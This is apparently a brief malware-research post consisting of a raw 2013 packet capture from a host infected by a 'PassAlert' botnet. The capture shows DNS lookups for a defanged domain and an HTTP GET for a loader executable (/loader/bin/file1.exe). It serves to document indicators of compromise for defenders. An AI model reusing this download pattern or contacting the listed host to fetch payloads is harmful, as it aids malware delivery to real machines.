PassAlert Pass Alert Porn Malware Botnet

By | June 19, 2015

2013-05-12 16:13:41.237980 IP 172.16.253.240.53 > 8.8.8.8.53: 34127+ A? porno-video-free[.]com. (38)
E..B……………..5.5…..O………..porno-video-free[.]com…..
2013-05-12 16:13:41.238039 IP 172.16.253.240.53 > 4.2.2.2.53: 34127+ A? porno-video-free[.]com. (38)
E..B……………..5.5…..O………..porno-video-free[.]com…..
2013-05-12 16:13:41.265029 IP 8.8.8.8.53 > 172.16.253.240.53: 34127 1/0/0 A 64.74.223.10 (54)
E..R……………..5.5.>…O………..porno-video-free[.]com……………..@J.

2013-05-12 16:13:41.270894 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [S], seq 3097962556, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…1Z….@J.
. .P..(<....p............... 2013-05-12 16:13:41.284000 IP 64.74.223.10.80 > 172.16.253.240.1033: Flags [S.], seq 910574124, ack 3097962557, win 64240, options [mss 1460], length 0
E..,……..@J.
…..P. 6FB,..(=`…v………
2013-05-12 16:13:41.284076 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [.], ack 1, win 64240, length 0
E..(..@…1a….@J.
. .P..(=6FB-P…….
2013-05-12 16:13:41.284321 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [P.], seq 1:92, ack 1, win 64240, length 91
E…..@…1…..@J.
. .P..(=6FB-P…….GET /loader/bin/file1.exe HTTP/1.1
User-Agent: Mozilla/5.0
Host: porno-video-free[.]com

2013-05-12 16:13:41.284487 IP 64.74.223.10.80 > 172.16.253.240.1033: Flags [.], ack 92, win 64240, length 0
E..(……..@J.
…..P. 6FB-..(.P………….
2013-05-12 16:13:41.296376 IP 4.2.2.2.53 > 172.16.253.240.53: 34127 1/0/0 A 64.74.223.10 (54)
E..R……………..5.5.>…O………..porno-video-free[.]com……………..@J.

2013-05-12 16:13:41.297893 IP 64.74.223.10.80 > 172.16.253.240.1033: Flags [R.], seq 1, ack 92, win 64240, length 0

Share Button